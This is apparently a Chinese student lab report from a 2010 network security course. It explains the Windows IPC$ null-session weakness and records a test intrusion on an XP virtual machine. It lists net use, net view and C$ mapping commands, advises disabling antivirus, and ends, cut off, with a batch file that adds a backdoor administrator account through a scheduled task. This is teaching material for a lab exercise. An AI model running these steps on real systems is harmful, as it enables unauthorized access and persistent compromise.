网络安全实例.docxVIP

某某学院 实习报告 实践环节名称： 网络安全与病毒防范学 院： 某某学院 专 业、班 级： 指 导 教 师： 学 生 姓 名： 学 号： 2010 年 5 月 20 日 一、 实习目的 剖析常见网络协议、操作系统与应用程序漏洞，分析黑客入侵的思路和方法， 实践防止黑客网络攻击的基本手段。 了解防火墙的基本原理和防火墙的主要技术，掌握防火墙的配置和使用方法。 掌握常见的网络安全技术，学习数据加密的原理。 提高学生的网络安全意识和病毒防范水平二、 实习时间 2010.5.16——2010.5.20 三、 实习地点网络实验室 四、 实习内容： 关于IPC$漏洞 IPC$是共享“命名管道”的资源，他是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。 IPC$是Windows NT/2000 的一种新功能，可在同一时间内，两个IP 之间只允许建立一个连接。Windows NT/2000 在提供了IPC$功能的同时，在初次安装系统时还打开了默认共享，即所有的逻辑共享和系统目录winnt 和windows(admin$)共享。 IPC$漏洞。其实 IPC$本身并不是一个真正意义上的漏洞，其主要漏洞在于其允许空会话，空会话是在没有信任的情况下与服务器建立的会话。 对于Windows NT 系列的操作系统。在默认安全设置下，借助空连接可以列举目录主机上的用户和共享，访问everyone 2000 作用更小,因为在 Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表，而且实现起来也不方便，需要借助工具。从以上描述来看空会话好像没有多大用处，但从一次完整的 IPC$入侵来看，空会话是一个不可缺少的跳板，一些具体命令如下 首先建立一个空会话，命令：net use \\ipc$“”/user“” ② 空会话建立之后，可以进行查看远程主机的共享资源。命令：netview \\ip ③ 查看远程主机的当前时间。命令：net time \\ip ④ 得到远程主机的NetBIOS 用户名列表。命令：nbtstat-A ip 通过以上对IPC$DE 学习成功建立IPC$入侵 windowsXP ，测试环境：主机（windowsXP sp3）与wndows XP sp2 虚拟机) 通过IPC$与windowsXP 建立连接，在现在的绝大多数的XP 操作系统中总是会出现问题。以下如何解决在建立IPC$出现的一系列问题。IPC$(Internet process connection), 通常很多的机子的默认共享都是打开的！在cmd 下使用net share 命令是不是发现有很多$，“ipc$ admin$ ，c$ ，d$. ”，现在进入正题： net use \\目标IP\ipc$ 在实验过程中出现了出现“53 错误”，后请教老师后，原来目标主机打开了系统防火墙或者其他防火墙软件。 解决方法：计算机上的杀毒软件退出，服务禁止，防止杀毒软件将部分工具作为恶意代码进行删除。服务禁止办法，在控制面板-管理工具-服务， 打开服务，看到杀毒软件相关服务项，点属性，选择常规，将正在启用的服务先停止，后选择启动类型，选择禁用。 出现 1326 错误： net use \\目标IP\ipc$ /user:administrator进行连接，报告系统发生 1326 错误，登陆失败：未知用户名或密码错误。检查一下我们的命令是否错误或者用户名错误。结果发现无错。 在远程机的控制面板-文件夹选项-查看-简单的文件共享,去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest 连接，是无法访问IPC$等管理共享的.结果发现时这个错误，纠正。紧接着可能出现 1327 错误：登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。在远程机的控制面板－管理工具－本地安全策略－ 安全选项－用户权限指派里，禁用空密码用户只能进行控制台登陆. 映射对方默认共享c 盘：net use z: \\目标IP\c$ 实习总结建立 ipc$告一段落，删除 ipc$连接：net sue \\目标 IP\ipc$ /del 在次基础上在目标电脑上留下后门账号：编写一个批处理文件，并拷贝到对方的电脑上，然后增加计划任务执行批处理文件； 批处理命令：（保存为 adduser.bat）net user nebulastest 123456 /ad d//增加用户nebulastest，密码123456 net localgroup administrators neb ulastest /add //为用户 nebulastest 赋予管理